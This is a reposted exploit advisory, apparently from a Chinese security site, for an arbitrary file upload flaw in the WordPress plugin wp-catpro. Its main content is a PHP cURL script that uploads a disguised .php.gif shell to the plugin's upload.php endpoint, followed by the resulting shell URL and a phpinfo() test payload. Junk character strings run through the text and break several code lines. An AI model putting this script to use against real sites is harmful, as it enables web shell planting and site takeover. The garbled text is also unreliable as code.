WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
  e7 ?' }) V! v0 ~/ [  a+ G5 G" m3 I#-----------------------------------------------------------------------
: e9 W- R5 l8 f5 B+ R: d$ F
% u, s3 D0 F7 e& j  Y. O作者  => Zikou-16
. M/ q* M* ^# m: g邮箱 => zikou16x@gmail.com
' g) ]2 r) a# x" B* x* n' t测试系统 : Windows 7 , Backtrack 5r3
% j0 W& X; N" I' I下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

% ]7 Q. o4 p7 ]3 }" c#=> Exploit 信息:
6 L. Q4 R! @* _% b------------------
4 `8 S. d* y7 G6 J0 B( h# 攻击者可以上传 file/shell.php.gif
$ r$ }% j7 @7 M& q- `! W# Z% P& z# ("jpg", "gif", "png")  // Allowed file extensions
$ I- W6 r; d$ z* x+ C- \4 `# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
- _' _$ Y8 {! O" {------------------

#=> Exploit
-----------
, _5 y2 I5 B$ c: A  G/ _1 O7 c<?php

$uploadfile="zik.php.gif";
" J$ C; d1 e9 N$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
. _, j% v4 u5 r, N( a! D( xcurl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
* t9 o! o: z% e- Uarray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
5 c! ?" m0 H( R9 c; b4 z$postResult = curl_exec($ch);
8 T5 {2 q. S) Gcurl_close($ch);
- M5 I/ C$ v1 ]! U. C
print "$postResult";
# T& w/ }! d: ?5 K8 c
$ K) _$ D1 z* n2 [Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
' L8 B2 t8 o# s+ X$ V  ?>
# s; z  R6 d* T! Y<?php
4 c- v3 u& c1 i0 ~phpinfo();
( E+ l2 ~( f' E2 {, [+ E?>